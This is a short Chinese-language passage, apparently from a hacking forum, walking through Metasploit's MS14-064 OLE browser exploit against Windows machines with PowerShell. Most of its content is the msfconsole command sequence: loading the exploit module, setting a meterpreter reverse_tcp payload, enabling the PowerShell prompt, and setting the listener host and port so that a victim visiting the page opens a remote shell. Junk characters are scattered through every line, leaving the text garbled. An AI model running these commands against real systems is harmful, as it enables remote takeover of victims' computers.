$ u& O# L1 S" x
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示+ T+ i* Y+ u' j- L# K, k% C
" b/ y. `$ ]9 O* ~. l3 p
) P, w2 \ K W) D, V0 q! C 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
% M3 e7 J; K3 W8 P
6 ]6 H! y/ }0 Q! E0 V F: B$ k. c3 b. q
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp9 H& B" m- I4 Z9 N# g, p
5 H* J A0 }" F1 x) k
. V$ \4 {9 D3 @/ M4 ^
set AllowPowershellPrompt true
3 x( E1 c5 }" m8 k4 N; s
* Z5 B- N" _) E. o
0 H) n1 P! \3 Z" |0 a Set LHOST 192.168.0.109
* k- c' y) o8 g( |1 Q" e. k
3 o- H B) E2 L* y
/ p: g1 a4 d4 W' Y6 u* I' K
set SRVHOST 192.168.0.109
0 f7 ~; i$ d: t/ t* M
) I: c' a. q* ]" N" D
0 Y5 v$ h9 r5 E! x" d4 D% h Set uripath share
8 Z5 L, t& A3 y5 Q( l
, b: z7 d' {# f0 n$ \! l
. g; v/ ?& G$ x) s) a; y) P' @) m Set srvport 807 C1 x5 B$ E! _" M
1 k. u. T3 h1 d9 Z0 R$ U5 N3 k8 y1 Q5 G( g2 k
" u7 m( V0 u1 U& F
" E% S2 l0 s, N
1 d5 M% y$ {2 t8 k) @8 ^ O
7 J" H* w! r3 C3 Y
. m3 q/ _$ d8 k
* q m9 r. R8 k
/ R4 U) H) L% V0 r, h! t; A! B8 b: i
$ G# _5 {" y/ I6 u& o3 [7 n9 G( V; I) p/ Z& {2 V
! ^2 g0 D+ k/ ?3 S! k" Y
2 o# v9 n$ d2 O7 ^/ t2 D+ D5 Z1 a/ ] N& d
: Z* n4 m5 l+ q8 I* \. f) E
% L6 \0 z8 t4 I
; o1 o" o ~) g+ M( Q9 t7 `
下面我们来访问本地地址如图:7 v0 \ l4 q8 v" j" ~
1 Y- o6 o0 y$ [! U# m
- ?, B9 d& e7 G+ s
6 ]( j6 X; m9 |$ h! |
+ Y i1 {2 _2 q6 Q2 l; a- S" b0 i
5 P7 S/ U1 ~+ j, Y
% i, W7 r! F: P# M( h. c- i$ v* q2 V/ W1 h, \5 s) g& C _& H
3 T5 y/ g- W# l, Q- ^